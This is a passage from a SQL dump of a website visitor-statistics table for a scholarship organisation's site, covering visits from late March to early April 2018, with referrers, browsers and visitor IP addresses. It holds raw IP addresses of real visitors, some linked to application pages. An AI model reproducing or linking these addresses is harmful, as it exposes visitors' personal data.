,0),(27920,'2018-03-31','http://12u.info/','MSIE','Windows','6.0','','178.159.37.55','000',6,0),(27921,'2018-03-31','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','174.198.2.44','000',8,0),(27922,'2018-03-31','https://zphiblgz.org','Firefox','Linux','59.0','','71.121.248.185','000',14,0),(27923,'2018-03-31','https://kazka.ru/','MSIE','Windows','5.0','','178.159.37.55','000',3,0),(27924,'2018-03-31','https://www.google.com/','Chrome','Windows','65.0.3325.181','','73.129.22.251','000',6,0),(27925,'2018-03-31','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','67.167.115.51','000',7,0),(27926,'2018-03-31','http://pk-services.ru/','MSIE','Windows','6.0','','46.119.121.22','000',2,0),(27927,'2018-03-31','https://zphiblgz.org/scholarship/application/?gf_token=adde7e3c480547b9abed971e10974209','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',2,0),(27928,'2018-03-31','https://zphiblgz.org/scholarship/application/','Chrome','Windows','65.0.3325.162','','73.172.63.178','000',1,0),(27929,'2018-03-31','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(27930,'2018-03-31','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.7','000',1,0),(27931,'2018-03-31','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1744.bBj1U7S_4uHUxyPZXOJrQwB9AZNpYtL8EEoxD2Dl15tFfcxYRN8oGuVepXLv_5lh.aa12102e9760e00c5ba1d83d6a293efdd6f63bcf&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZkxKeGVRMS1KV3EwczdkODhPaDVCcTlOeUQzWDN1dkh4OTlDc0FzaEpGV04xdTV1RGRIR2Z6WQ&b64e=2&sign=7bd28663cfd99fa6c394c94995ea6b19&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96Foc1r0O-2G_LLbfAvNqJaN7BYQnunXvMAd2UVuopmAmXGwioUFPFjz-gnEHJpC6f3pYmC7D9tg5JTYAZNROHt1gwAtEdlsHMN7vE26Y-_58delewQKAYU9feUdi5gjLpD&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVz9TJ3Mp6DkfawiW6_Bi6uoscOvmRzYHD2vqLiyLA5LuMJBH9P84yVgl59RByutzOTvQ_RlJA3GQ&l10n=ru&cts=1522521838054&mc=3.31430802362','Opera Next','Windows','51.0.2830.55','','77.37.221.119','000',2,0),(27932,'2018-03-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(27933,'2018-03-31','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(27934,'2018-03-31','https://zphiblgz.org','Safari','Macintosh','11.0.3','','96.244.229.165','000',8,0),(27935,'2018-03-31','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(27936,'2018-03-31','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.143','000',1,0),(27937,'2018-03-31','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(27938,'2018-03-31','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','73.200.184.133','000',5,0),(27939,'2018-03-31','https://zphiblgz.org','Safari','Macintosh','10.1.2','','173.69.165.90','000',2,0),(27940,'2018-03-31','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(27941,'2018-03-31','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','96.86.43.81','000',6,0),(27942,'2018-03-31','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(27943,'2018-03-31','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(27944,'2018-03-31','http://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','119.96.53.80','000',1,0),(27945,'2018-03-31','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(27946,'2018-03-31','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','68.134.12.220','000',14,0),(27947,'2018-03-31','https://www.google.com/','Safari','Macintosh','11.0.3','','73.200.184.133','000',2,0),(27948,'2018-03-31','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.236.77','000',2,0),(27949,'2018-03-31','https://www.google.com/','Chrome','Android','65.0.3325.109','','73.39.186.188','000',3,0);
INSERT INTO `lwz_statistics_visitor` VALUES (27950,'2018-03-31','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(27951,'2018-03-31','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(27952,'2018-03-31','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(27953,'2018-03-31','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(27954,'2018-03-31','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.157','000',1,0),(27955,'2018-03-31','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.182','000',1,0),(27956,'2018-03-31','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.7.186','000',1,0),(27957,'2018-03-31','https://zphiblgz.org','SamsungBrowser','Android','7.0','','172.56.22.197','000',11,0),(27958,'2018-03-31','https://zphiblgz.org','Chrome','Android','65.0.3325.109','','172.56.22.197','000',5,0),(27959,'2018-03-31','https://laminat.com.ua/','MSIE','Windows','3.02','','178.137.86.152','000',1,0),(27960,'2018-03-31','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','138.68.157.168','000',2,0),(27961,'2018-04-01','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.182','000',1,0),(27962,'2018-04-01','http://komp-pomosch.ru/','MSIE','Windows','5.5','','46.118.127.172','000',2,0),(27963,'2018-04-01','https://zphiblgz.org/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','AppleWebKit','Windows','534','','131.253.27.137','000',1,0),(27964,'2018-04-01','http://site.ru','Chrome','Windows','5.0.375.99','','81.30.221.117','000',1,0),(27965,'2018-04-01','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',2,0),(27966,'2018-04-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1744.lS2kE29RbPGINVbpcrpETaHU0HW4UvBVZbFo8qX-6mQ.b3d177a326f8676d62237e79ec45657dc8394e7a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NGlzTlBJZjk5OWJIVGVmYnp5REdNVXJNdkxlRnhHRnVBWGZVbEJzVy1BZyws&sign=d161e25a82542f3f0eff70cf0b908309&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.140.207','000',2,0),(27967,'2018-04-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1744.bkBIcJuOCT4JJiZLHjXAoaY6sx3cu4D36c3M_wey7JQ.08a0632f95898c56ff98b5f0c45c59954ca0b62b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Z2pOc2Vjak9vMU5NZTFoUzlXVXNXVGF5a2FUWUR3dFJlVm4tdlg1Uk0xdyws&sign=36559042767fe3332bab7e1bf3e3af23&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.171.202','000',2,0),(27968,'2018-04-01','http://www.zphiblgz.org','Chrome','Macintosh','58.0.3029.110','','104.192.74.41','000',28,0),(27969,'2018-04-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.192.74.41','000',24,0),(27970,'2018-04-01','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','195.154.58.144','000',1,0),(27971,'2018-04-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1744.FTmIXfVAoQyVqW_VUaRAhYMJjOdmm8Y1bmhnNci2lWM.2acf812d945f607dc9931a92568feb4c2fa5b833&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040U20wNTExMXhFQkdQUzV4UmhzbUhkaTBQYmZ1VXRmU2dzNFhyZ2hsRkY0Zyws&sign=3ade70fa92fe7c08e2f762626709b126&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.189.44','000',2,0),(27972,'2018-04-01','https://hoztorg-opt.ru/','Unknown','Unknown','Unknown','','46.119.121.22','000',1,0),(27973,'2018-04-01','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(27974,'2018-04-01','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.202.110','000',2,0),(27975,'2018-04-01','https://office2web.com/','Unknown','Unknown','Unknown','','134.249.55.53','000',2,0),(27976,'2018-04-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','185.7.252.114','000',1,0),(27977,'2018-04-01','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','68.51.51.251','000',2,0),(27978,'2018-04-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1744.lw-qeJLM8RuvRwQa24rn1TMufhuDuTNk4v-w2GSVlRA.9398914288c5068df567140db163100fe869abe6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d2F5cFM4NnZ4cTBUZUJERm5HOHJ4c0xpZmpnLUd6V3NmSjFnUzRDSm5lUSws&sign=5c73b280bb5ec36c98fd7082a27e5ef4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.220.205','000',2,0),(27979,'2018-04-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1744.AwbWeTtk4LqdLcUi8TQ6FFjc6ofImIQfTuW3EI-z6nA.568e310c1c88f7349ff26822be7d2c273df2bf1b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042STdwZ29yeVYteUttN0l1aWxDYlZqY1Y2ejJmRmpaUWkxVjliWWJkR2NQUSws&sign=b7e608d7be1815eeeb396f804a644a79&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','5.135.173.239','000',2,0),(27980,'2018-04-01','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1744.aMMjOt13YRnoE2vgzKMwRZOQQRaKSAYTZWid40yvt0M.ea2933de46dd73607bb1ea3d89dbd03e720a7322&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040djY3NDhKNnpCWEtNY2lDRnFiOFdXNFJydTFSNGFibklGS1U2dy0ybzQzdyws&sign=ad9cdfa54941a708a926fa1b929e2674&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.76.185.120','000',2,0),(27981,'2018-04-01','http://magnetic-bracelets.ru/','Opera','Windows','7.60','','46.119.121.22','000',3,0),(27982,'2018-04-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(27983,'2018-04-01','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.186.134','000',3,0),(27984,'2018-04-01','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.183.13','000',79,0),(27985,'2018-04-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(27986,'2018-04-01','https://beachtoday.ru/','Opera','Windows','8.01','','5.248.253.101','000',3,0),(27987,'2018-04-01','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(27988,'2018-04-01','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.28','000',1,0),(27989,'2018-04-01','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(27990,'2018-04-01','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(27991,'2018-04-01','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.217.246','000',37,0),(27992,'2018-04-01','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(27993,'2018-04-01','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.27','000',1,0),(27994,'2018-04-01','https://zphiblgz.org','Chrome','Windows','10.0.601.0','','95.181.179.219','000',2,0),(27995,'2018-04-01','https://zphiblgz.org','Chrome','Linux','17.0.963.12','','95.181.179.219','000',1,0),(27996,'2018-04-01','https://zphiblgz.org','Chrome','Windows','13.0.782.24','','95.181.179.219','000',1,0),(27997,'2018-04-01','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.159.88','000',30,0),(27998,'2018-04-01','https://www.google.com/','Safari','iPhone','11.0','','107.77.236.18','000',2,0),(27999,'2018-04-01','https://edudocs.net/','Opera','Windows','8.01','','134.249.55.53','000',1,0),(28000,'2018-04-01','http://elementspluss.ru/','MSIE','Windows','6.0','','46.118.127.172','000',2,0),(28001,'2018-04-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.213.21','000',2,0),(28002,'2018-04-01','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.28','000',1,0),(28003,'2018-04-01','http://aibolita.com/','Unknown','Unknown','Unknown','','178.137.86.152','000',3,0),(28004,'2018-04-01','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.28','000',1,0),(28005,'2018-04-01','https://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','71.121.248.185','000',2,0),(28006,'2018-04-01','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(28007,'2018-04-01','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(28008,'2018-04-01','https://zphiblgz.org','NYU','Unknown','Unknown','','5.188.203.40','000',5,0),(28009,'2018-04-01','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.239.118','000',2,0),(28010,'2018-04-02','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','178.137.165.32','000',1,0),(28011,'2018-04-02','https://zphiblgz.org/','Firefox','Windows','56.0','','31.187.76.98','000',1,0),(28012,'2018-04-02','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.189','000',2,0),(28013,'2018-04-02','https://jobius.com.ua/','Unknown','Unknown','Unknown','','46.118.127.172','000',1,0),(28014,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','213.186.119.52','000',2,0),(28015,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','94.154.96.219','000',1,0),(28016,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','138.197.217.55','000',2,0),(28017,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','87.229.51.49','000',2,0),(28018,'2018-04-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(28019,'2018-04-02','http://healbio.ru/','MSIE','Windows','6.0','','178.137.86.152','000',2,0),(28020,'2018-04-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1745.5mgLmCWTfaNrmlfE8syksQ7plsuVcLn_lYnuTGWD6DI.319aa7451f7ff894ad7c0b432e345da24db889c9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042YkdWTWpOV2MzYkNJQV9HVFFUSDhDU2VDMElObzM5ckVJenR4OE5acG9mZyws&sign=4bf1f836d03d108ecb19a5d942c1b369&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.166.33','000',2,0),(28021,'2018-04-02','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',3,0),(28022,'2018-04-02','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','173.69.133.145','000',6,0),(28023,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','94.23.16.5','000',1,0),(28024,'2018-04-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1745.TP9aEAsagbq74YxYrNYgLN1a0gjqEL9hXmqgxk1Iae8.9b90359ac6296ddb155151f0955f2e480da0640c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NWdkWWJWYkJqbGZib1EzX2RlcWlaME9xY1Vfd1RIa19PVnFXeTBQNXNVQSws&sign=59bc412d2bd8c6ced4947d9e1d9f9220&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.209.213.31','000',2,0),(28025,'2018-04-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1745.TIJ_mA-nY3LRQPOjCbJuDaa3_n1a6XE8NASLUJdN6gI.ef039b594fb879a748ba257c022022387bf9168c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040M1ZNOHZaNUxJWjM4QkQ1MkhrRVpWYW03WTV4bVEwcW9ZbEZieXRlcHR1dyws&sign=8122cb9455617a9194c4469efc3796f1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.182.117.196','000',2,0),(28026,'2018-04-02','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.88.203','000',2,0),(28027,'2018-04-02','https://www.google.com/','Chrome','Android','65.0.3325.109','','73.39.186.188','000',3,0),(28028,'2018-04-02','https://zphiblgz.org','Python','Unknown','3.6','','54.77.47.140','000',2,0),(28029,'2018-04-02','https://online-intim.com/','MSIE','Windows','6.0','','46.118.127.172','000',1,0),(28030,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.20','000',1,0),(28031,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','185.98.7.102','000',3,0),(28032,'2018-04-02','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(28033,'2018-04-02','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','68.134.12.220','000',7,0),(28034,'2018-04-02','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1745.4qQpPO4NXyy2Il6WIq5dFKPtst_NTV01SUR_qIU4R78.24469fcad33c867fd103d8e3efd9d344d370d05b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d0MwcjVRa3N0bldYemtSLUNpNUJkQjFvcUllV2k3WVpPQlZQOGtFUjByQSws&sign=1e95192578f0c47c0e82f8e20b6a2bd3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.231.216','000',2,0),(28035,'2018-04-02','https://www.google.com/','Chrome','Windows','65.0.3325.181','','128.59.152.58','000',3,0),(28036,'2018-04-02','http://zphiblgz.org/','Firefox','Windows','43.1','','95.128.163.132','000',3,0),(28037,'2018-04-02','https://mikozstop.com/','Unknown','Unknown','Unknown','','134.249.55.53','000',2,0),(28038,'2018-04-02','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.163','000',1,0),(28039,'2018-04-02','https://exdocsfiles.com/','Opera','Windows','9.00','','134.249.55.53','000',1,0),(28040,'2018-04-02','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.123','000',1,0),(28041,'2018-04-02','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.144','000',1,0),(28042,'2018-04-02','http://slomm.ru/','Unknown','Unknown','Unknown','','46.119.121.22','000',3,0),(28043,'2018-04-02','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.31','000',1,0),(28044,'2018-04-02','https://zphiblgz.org','Firefox','Windows','51.0','','142.179.38.223','000',2,0),(28045,'2018-04-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(28046,'2018-04-02','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(28047,'2018-04-02','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(28048,'2018-04-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.58','000',13,0),(28049,'2018-04-02','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(28050,'2018-04-02','http://zphiblgz.org/scholarship/','Safari','iPhone','7.0','','40.77.177.157','000',1,0),(28051,'2018-04-02','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.27','000',1,0),(28052,'2018-04-02','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(28053,'2018-04-02','http://site.ru','Chrome','Windows','5.0.375.99','','93.125.99.82','000',1,0),(28054,'2018-04-02','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(28055,'2018-04-02','https://zphiblgz.org/scholarship/','Safari','Macintosh','11.0.3','','96.244.229.165','000',3,0),(28056,'2018-04-02','https://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','13.56.188.52','000',2,0),(28057,'2018-04-02','https://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','13.56.12.103','000',32,0),(28058,'2018-04-02','https://zphiblgz.org','Chrome','Linux','63.0.3205.0','','54.215.252.208','000',3,0),(28059,'2018-04-02','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.28','000',1,0),(28060,'2018-04-02','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(28061,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(28062,'2018-04-02','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(28063,'2018-04-02','https://animenime.ru/','Unknown','Unknown','Unknown','','178.137.86.152','000',2,0),(28064,'2018-04-02','http://03e.info/','MSIE','Windows','2.0d','','178.159.37.55','000',6,0),(28065,'2018-04-02','http://www.zphiblgz.org','Chrome','Windows','62.0.3202.75','','35.165.216.223','000',2,0),(28066,'2018-04-02','https://zphiblgz.org/','Firefox','Windows','55.0','','35.165.216.223','000',1,0),(28067,'2018-04-02','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(28068,'2018-04-02','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','71.6.165.200','000',3,0),(28069,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',2,0),(28070,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','95.128.43.164','000',2,0),(28071,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(28072,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.10.69','000',2,0),(28073,'2018-04-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(28074,'2018-04-03','https://www.google.com/','SamsungBrowser','Android','7.0','','66.91.38.223','000',3,0),(28075,'2018-04-03','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.28.205','000',2,0),(28076,'2018-04-03','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.165.148.51','000',1,0),(28077,'2018-04-03','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','24.3.116.129','000',1,0),(28078,'2018-04-03','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(28079,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','209.239.121.105','000',1,0),(28080,'2018-04-03','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(28081,'2018-04-03','http://stat.lviv.ua/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(28082,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','108.61.151.136','000',2,0),(28083,'2018-04-03','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','173.69.177.13','000',3,0),(28084,'2018-04-03','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','89.163.131.166','000',4,0),(28085,'2018-04-03','http://online-sbank.ru/','Opera','Windows','7.11','','46.118.127.172','000',2,0),(28086,'2018-04-03','http://deart-13.ru/','Unknown','Unknown','Unknown','','5.248.253.101','000',3,0),(28087,'2018-04-03','http://xn----7sbabn5abjehfwi8bj.xn--p1ai/','Opera','Windows','8.50','','46.119.121.22','000',3,0),(28088,'2018-04-03','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(28089,'2018-04-03','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(28090,'2018-04-03','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.30','000',1,0),(28091,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','88.151.101.15','000',2,0),(28092,'2018-04-03','https://univerfiles.com/','Opera','Windows','7.54','','134.249.55.53','000',1,0),(28093,'2018-04-03','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.11.167.4','000',1,0),(28094,'2018-04-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(28095,'2018-04-03','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',4,0),(28096,'2018-04-03','https://www.google.com/','Safari','iPhone','11.0','','73.200.188.232','000',2,0),(28097,'2018-04-03','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.87.168','000',2,0),(28098,'2018-04-03','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.28','000',1,0),(28099,'2018-04-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(28100,'2018-04-03','https://zphiblgz.org/','Firefox','Windows','32.1','','31.130.1.226','000',2,0),(28101,'2018-04-03','https://zphiblgz.org','Chrome','iPhone','65.0.3325.152','','108.56.212.185','000',1,0),(28102,'2018-04-03','https://zphiblgz.org','AppleWebKit','Macintosh','604.5.6','','73.212.64.200','000',1,0),(28103,'2018-04-03','https://zphiblgz.org','Safari','iPhone','11.0','','73.212.64.200','000',1,0),(28104,'2018-04-03','https://www.google.com/','Safari','iPhone','11.0','','73.135.210.51','000',1,0),(28105,'2018-04-03','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(28106,'2018-04-03','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.29','000',1,0),(28107,'2018-04-03','https://zphiblgz.org','Safari','Macintosh','11.0.3','','73.212.64.200','000',13,0),(28108,'2018-04-03','https://zphiblgz.org/','Chrome','Linux','63.0.3239.84','','185.104.219.80','000',1,0),(28109,'2018-04-03','https://www.google.com/','Chrome','Android','65.0.3325.109','','107.77.202.195','000',3,0),(28110,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','164.132.49.223','000',1,0),(28111,'2018-04-03','http://site.ru','Chrome','Windows','5.0.375.99','','50.116.38.38','000',2,0),(28112,'2018-04-03','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',2,0),(28113,'2018-04-03','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.35'